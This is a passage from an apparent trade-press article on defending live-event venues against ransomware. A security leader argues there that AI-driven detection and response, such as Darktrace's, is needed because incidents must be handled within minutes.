Organizations rely on the metrics MTTK (mean time to know) and MTTR (mean time to repair) to identify, investigate, and mitigate the incidents. Those metrics highlight the challenges facing live events because the clock is already ticking. If the security team takes more than 10 or 15 minutes to detect and investigate an incident, that is already halfway through the first half of the game and the halftime show is coming up, Benslimane says. This is the biggest advertising window, and not being able to broadcast the ads would be a significant blow to the organization, which makes it even more likely that these venues would pay the ransom.

“The cybercriminals clearly understand that if something happens during D-Day, there won’t be enough time to respond,” Benslimane says.

**Moving Faster than the Attackers**

Attackers move faster than defenders, which makes it difficult for security teams to respond during an event. For defenders to be able to respond effectively, they need to be operating at machine speed, which means using artificial intelligence (AI) as part of the security response, Benslimane says, noting that he deployed Darktrace’s technology in his past roles. The AI can look at all of the events happening in the network and correlate them quickly to identify which issues are problematic. If the investigation finds that the issue is actually not a problem, then the AI doesn’t take any action. And if there is an issue, the AI already has the information it needs from the investigation to neutralize the threat and remediate, such as by blocking a particular connection or isolating the affected system.

The AI is like a “sponge” for knowledge. 

“As long as you put in water, the sponge will absorb it. The AI brain will absorb everything you give it,” Benslimane says.

Speed is paramount for detection, investigation, and making the decision on how to respond, especially when the environment is complex and constantly evolving. The infrastructure for a live events venue is not static, so the AI is constantly learning, analyzing, and making decisions.

The AI is “much faster than 1000 cybersecurity guys in a SOC – even if it’s the best SOC in the world,” Benslimane says.

Tag

#wifi